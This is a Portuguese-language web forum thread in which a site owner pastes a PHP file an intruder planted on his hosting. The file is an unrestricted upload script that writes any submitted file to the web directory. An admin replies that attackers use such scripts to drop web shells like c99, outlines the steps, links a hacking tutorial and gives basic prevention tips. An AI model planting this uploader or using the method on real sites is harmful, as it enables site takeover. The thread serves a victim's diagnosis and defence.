Fóruns sobre PHP, JavaScript, HTML, MySQLi, jQuery, Banco de Dados, CSS


Moderador: web

 
Primeiras postagens
Primeiras postagens
Tópico Autor
Mensagens: 7
Sexo: Masculino

Invadiram minha hospedagem com esse codigo

30-12-2014 00:08

nao sei se é bem aqui que coloca mais se nao for desculpa alguem muda pfv , então vou logo pro assunto , um cara invadiu minha hospedagem com esse codigo
Alguem sabe oque é isso ?

<?php if(isset($_POST['Submit'])){     $filedir = "";      $maxfile = '2000000';     $userfile_name = $_FILES['image']['name'];     $userfile_tmp = $_FILES['image']['tmp_name'];     if (isset($_FILES['image']['name'])) {         $abod = $filedir.$userfile_name;         @move_uploaded_file($userfile_tmp, $abod);    echo"<center><b>Done ==> $userfile_name</b></center>"; } } else{ echo' <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>'; } ?>

0
 
Avatar do usuário
ADMIN
ADMIN
Mensagens: 17666
Nome: Kleber
Descrição do site: Onde você encontra scripts grátis para o seu site
Sexo: Masculino
Localização: RJ / RJ / Brasil
Contato:

Invadiram minha hospedagem com esse codigo

30-12-2014 08:11

Um código de upload sem proteção é bem perigoso.
Existe um arquivo, geralmente em PHP que os hackers usam. Eles tentam de alguma forma colocar esse arquivo no seu domínio.

Dá uma olhada nesse print abaixo do arquivo que enviam para o seu domínio para controlar o site

Imagem

- Acessam a página de upload;
- Enviam o arquivo;
- Recebem o nome do arquivo;
- Acessam pelo navegador: seudominio.com/arquivo.php


Eles colocam esse arquivo no seu domínio de algumas formas:

- upload de arquivos sem proteção;
- pacote de arquivos "para fóruns por exemplo";
- plugins para blog, wordpress, entre outros.


Nesse link abaixo "em inglês" fala sobre esse arquivo que indiquei que os hackers usam para administrar os seus arquivos
http://hacking007tricks.blogspot.com.br/2013/04/how-to-hack-website-using-c99shell-php.html

Soluções para evitar esse problema:

- Nunca permita que os usuários enviem arquivos para o seu servidor;
- Use senhas segura para o seu F.T.P e acesso ao seu domínio;
- Nunca baixe pacotes de arquivos para fóruns, blog, wordpress, etc.
0
A melhor hospedagem para o seu site HostGator!

Quem está online

Usuários navegando neste fórum: Nenhum usuário registrado